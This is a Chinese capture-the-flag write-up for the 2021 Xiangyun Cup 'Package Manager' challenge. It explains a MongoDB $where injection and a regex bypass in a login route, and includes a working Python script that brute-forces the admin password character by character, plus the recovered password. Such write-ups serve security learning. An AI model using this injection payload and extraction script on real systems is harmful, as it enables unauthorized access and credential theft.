[2021祥云杯]Package Manager 2021

[2021祥云杯]Package Manager 2021

文章目录 [2021祥云杯]Package Manager 2021mongodb注入另一种解法：抛出异常
下载附件

cnpm install

安装对应的依赖

mongodb注入

通过schema.ts可以知道用的是mongoDB数据库

Mongoose 是一个让我们可以通过Node来 *** 作MongoDB数据库的一个模块

然后在index.ts中的/auth路由存在sql注入漏洞

router.get('/auth', (_, res) => res.render('auth'))

router.post('/auth', async (req, res) => {
	let { token } = req.body;
	if (token !== '' && typeof (token) === 'string') {
		if (checkmd5Regex(token)) {
			try {
				//这里存在sql注入漏洞
				let docs = await User.$where(`this.username == "admin" && hex_md5(this.password) == "${token.toString()}"`).exec()
				console.log(docs);
				if (docs.length == 1) {
					if (!(docs[0].isAdmin === true)) {
						return res.render('auth', { error: 'Failed to auth' })
					}
				} else {
					return res.render('auth', { error: 'No matching results' })
				}
			} catch (err) {
				return res.render('auth', { error: err })
			}
		} else {
			return res.render('auth', { error: 'Token must be valid md5 string' })
		}
	} else {
		return res.render('auth', { error: 'Parameters error' })
	}
	req.session.AccessGranted = true
	res.redirect('/packages/submit')
});

虽然在token之前要经过checkmd5Regex函数的检测，但是我们跟进查看这个函数

在正则匹配的时候，没有用^$匹配头部或者尾部，所以存在绕过

只需要在token的前面放上一串32长度的字符串aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa，就可以满足这个匹配

const checkmd5Regex = (token: string) => {
  return /([a-f\d]{32}|[A-F\d]{32})/.exec(token);
}

我们可以写一个脚本来将admin的password爆破出来

import requests
import string

url = "http://b5c92fb4-2133-499b-ae04-4dadb381e5bf.node4.buuoj.cn:81/auth"
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36 Edg/101.0.1210.47",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    "Referer": "http://b5c92fb4-2133-499b-ae04-4dadb381e5bf.node4.buuoj.cn:81/auth",
    "Accept-Encoding": "gzip, deflate",
    "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",
    "Cookie": "UM_distinctid=17f8d34a7f932c-0e50148d0f032b-56171d51-144000-17f8d34a7fae31; session=s%3A9hzuyZljr-wg3Dt2h0JoUGgeTX1uugga.e27PI%2Bcl9%2FuQQ1%2BqtdpsqVKjKtpSuFaq0lDZzPHEMVY",
    "Upgrade-Insecure-Requests": "1",
}
flag = ''
for i in range(100):
    print(i)
    for j in string.printable:
        data = {
            "_csrf":"sTH9KGXQ-zU7GcLfhx27sRaW9gCxEIqaFWrQ",
            "token":'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"||this.password[{}]=="{}'.format(i,j),
        }
        # print(data)
        r = requests.post(url = url ,headers= headers,data=data,allow_redirects=False)
        if "Found. Redirecting to"  in r.text:
            flag  = flag+j
            print(flag)
            break
# print(string.printable)
# 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ 

运行结果

登录即可

另一种解法：抛出异常

MongoDB支持js的语法，所以可以用js语法去抛出内容为admin密码的异常。

密码

!@#&@&@efefef*@((@))grgregret3r

登录即可得flag